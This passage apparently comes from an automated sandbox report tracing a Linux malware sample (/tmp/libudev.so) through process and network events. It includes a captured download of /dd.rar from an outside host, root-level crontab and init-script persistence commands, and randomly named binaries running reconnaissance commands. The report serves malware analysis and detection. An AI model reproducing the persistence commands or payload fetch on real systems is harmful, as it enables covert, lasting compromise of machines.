                                                                                                                                          0192.168.2.235765254.36.15.9980
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Jul 9, 2022 18:43:50.434118032 CEST1OUTGET /dd.rar HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: zh-cn
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
                                                                                                                                          Host: www1.gggatat456.com
                                                                                                                                          Connection: Keep-Alive


                                                                                                                                          System Behavior

                                                                                                                                          Start time:18:43:48
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:/tmp/libudev.so
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:43:48
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:43:48
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:43:48
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:43:48
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:43:48
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:43:49
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/sbin/update-rc.d
                                                                                                                                          Arguments:update-rc.d libudev.so defaults
                                                                                                                                          File size:3478464 bytes
                                                                                                                                          MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                                                                                          Start time:18:43:49
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/sbin/update-rc.d
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:3478464 bytes
                                                                                                                                          MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                                                                                          Start time:18:43:49
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/bin/systemctl
                                                                                                                                          Arguments:systemctl daemon-reload
                                                                                                                                          File size:996584 bytes
                                                                                                                                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                                          Start time:18:43:49
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:43:49
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          Start time:18:43:49
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          Start time:18:43:49
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/bin/sed
                                                                                                                                          Arguments:sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
                                                                                                                                          File size:121288 bytes
                                                                                                                                          MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                                                                                          Start time:18:43:54
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:43:54
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:43:54
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/mljnlxkfff
                                                                                                                                          Arguments:/usr/bin/mljnlxkfff id 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:d750c8beac9f7e938ed3d56311d9b66c

                                                                                                                                          Start time:18:43:54
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/mljnlxkfff
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:d750c8beac9f7e938ed3d56311d9b66c

                                                                                                                                          Start time:18:43:54
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:43:54
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:43:54
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/mljnlxkfff
                                                                                                                                          Arguments:/usr/bin/mljnlxkfff "grep \"A\"" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:d750c8beac9f7e938ed3d56311d9b66c

                                                                                                                                          Start time:18:43:54
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/mljnlxkfff
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:d750c8beac9f7e938ed3d56311d9b66c

                                                                                                                                          Start time:18:43:54
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:43:54
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:43:54
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/mljnlxkfff
                                                                                                                                          Arguments:/usr/bin/mljnlxkfff su 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:d750c8beac9f7e938ed3d56311d9b66c

                                                                                                                                          Start time:18:43:55
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/mljnlxkfff
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:d750c8beac9f7e938ed3d56311d9b66c

                                                                                                                                          Start time:18:43:54
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:43:54
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:43:54
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/mljnlxkfff
                                                                                                                                          Arguments:/usr/bin/mljnlxkfff "cat resolv.conf" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:d750c8beac9f7e938ed3d56311d9b66c

                                                                                                                                          Start time:18:43:55
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/mljnlxkfff
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:d750c8beac9f7e938ed3d56311d9b66c

                                                                                                                                          Start time:18:43:55
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:43:55
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:43:55
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/mljnlxkfff
                                                                                                                                          Arguments:/usr/bin/mljnlxkfff ifconfig 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:d750c8beac9f7e938ed3d56311d9b66c

                                                                                                                                          Start time:18:43:55
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/mljnlxkfff
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:d750c8beac9f7e938ed3d56311d9b66c

                                                                                                                                          Start time:18:44:00
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:00
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:00
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/jjfbelholv
                                                                                                                                          Arguments:/usr/bin/jjfbelholv id 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:49d50c6d28b847418207973b5aeb45e4

                                                                                                                                          Start time:18:44:00
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/jjfbelholv
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:49d50c6d28b847418207973b5aeb45e4

                                                                                                                                          Start time:18:44:00
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:00
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:00
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/jjfbelholv
                                                                                                                                          Arguments:/usr/bin/jjfbelholv whoami 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:49d50c6d28b847418207973b5aeb45e4

                                                                                                                                          Start time:18:44:00
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/jjfbelholv
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:49d50c6d28b847418207973b5aeb45e4

                                                                                                                                          Start time:18:44:00
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:00
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:00
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/jjfbelholv
                                                                                                                                          Arguments:/usr/bin/jjfbelholv pwd 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:49d50c6d28b847418207973b5aeb45e4

                                                                                                                                          Start time:18:44:00
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/jjfbelholv
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:49d50c6d28b847418207973b5aeb45e4

                                                                                                                                          Start time:18:44:00
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:00
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:00
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/jjfbelholv
                                                                                                                                          Arguments:/usr/bin/jjfbelholv "sleep 1" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:49d50c6d28b847418207973b5aeb45e4

                                                                                                                                          Start time:18:44:00
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/jjfbelholv
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:49d50c6d28b847418207973b5aeb45e4

                                                                                                                                          Start time:18:44:00
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:00
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:00
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/jjfbelholv
                                                                                                                                          Arguments:/usr/bin/jjfbelholv "cd /etc" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:49d50c6d28b847418207973b5aeb45e4

                                                                                                                                          Start time:18:44:00
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/jjfbelholv
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:49d50c6d28b847418207973b5aeb45e4

                                                                                                                                          Start time:18:44:06
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:06
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:06
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/trcmbxxcta
                                                                                                                                          Arguments:/usr/bin/trcmbxxcta who 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:e93ee3f4ded35ceeab60752300a344d0

                                                                                                                                          Start time:18:44:06
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/trcmbxxcta
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:e93ee3f4ded35ceeab60752300a344d0

                                                                                                                                          Start time:18:44:06
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:06
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:06
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/trcmbxxcta
                                                                                                                                          Arguments:/usr/bin/trcmbxxcta "sleep 1" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:e93ee3f4ded35ceeab60752300a344d0

                                                                                                                                          Start time:18:44:07
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/trcmbxxcta
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:e93ee3f4ded35ceeab60752300a344d0

                                                                                                                                          Start time:18:44:07
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:07
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:07
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/trcmbxxcta
                                                                                                                                          Arguments:/usr/bin/trcmbxxcta who 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:e93ee3f4ded35ceeab60752300a344d0

                                                                                                                                          Start time:18:44:07
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/trcmbxxcta
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:e93ee3f4ded35ceeab60752300a344d0

                                                                                                                                          Start time:18:44:07
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:07
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:07
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/trcmbxxcta
                                                                                                                                          Arguments:/usr/bin/trcmbxxcta uptime 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:e93ee3f4ded35ceeab60752300a344d0

                                                                                                                                          Start time:18:44:07
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/trcmbxxcta
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:e93ee3f4ded35ceeab60752300a344d0

                                                                                                                                          Start time:18:44:07
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:07
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:07
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/trcmbxxcta
                                                                                                                                          Arguments:/usr/bin/trcmbxxcta uptime 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:e93ee3f4ded35ceeab60752300a344d0

                                                                                                                                          Start time:18:44:07
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/trcmbxxcta
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:e93ee3f4ded35ceeab60752300a344d0

                                                                                                                                          Start time:18:44:13
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:13
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:13
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ctwojuywol
                                                                                                                                          Arguments:/usr/bin/ctwojuywol "netstat -antop" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:637b8bb85e23041fe2f4a3767c0e251b

                                                                                                                                          Start time:18:44:13
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ctwojuywol
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:637b8bb85e23041fe2f4a3767c0e251b

                                                                                                                                          Start time:18:44:13
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:13
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:13
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ctwojuywol
                                                                                                                                          Arguments:/usr/bin/ctwojuywol pwd 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:637b8bb85e23041fe2f4a3767c0e251b

                                                                                                                                          Start time:18:44:13
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ctwojuywol
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:637b8bb85e23041fe2f4a3767c0e251b

                                                                                                                                          Start time:18:44:13
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:13
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:13
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ctwojuywol
                                                                                                                                          Arguments:/usr/bin/ctwojuywol bash 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:637b8bb85e23041fe2f4a3767c0e251b

                                                                                                                                          Start time:18:44:13
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ctwojuywol
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:637b8bb85e23041fe2f4a3767c0e251b

                                                                                                                                          Start time:18:44:13
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:13
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:13
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ctwojuywol
                                                                                                                                          Arguments:/usr/bin/ctwojuywol bash 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:637b8bb85e23041fe2f4a3767c0e251b

                                                                                                                                          Start time:18:44:13
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ctwojuywol
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:637b8bb85e23041fe2f4a3767c0e251b

                                                                                                                                          Start time:18:44:13
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:13
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:13
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ctwojuywol
                                                                                                                                          Arguments:/usr/bin/ctwojuywol "ifconfig eth0" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:637b8bb85e23041fe2f4a3767c0e251b

                                                                                                                                          Start time:18:44:14
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ctwojuywol
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:637b8bb85e23041fe2f4a3767c0e251b

                                                                                                                                          Start time:18:44:19
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:19
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:19
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/fsqerkomug
                                                                                                                                          Arguments:/usr/bin/fsqerkomug ls 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:e446fff5f449758979147b09c39cef27

                                                                                                                                          Start time:18:44:19
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/fsqerkomug
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:e446fff5f449758979147b09c39cef27

                                                                                                                                          Start time:18:44:19
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:19
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:19
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/fsqerkomug
                                                                                                                                          Arguments:/usr/bin/fsqerkomug "grep \"A\"" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:e446fff5f449758979147b09c39cef27

                                                                                                                                          Start time:18:44:19
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/fsqerkomug
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:e446fff5f449758979147b09c39cef27

                                                                                                                                          Start time:18:44:19
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:19
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
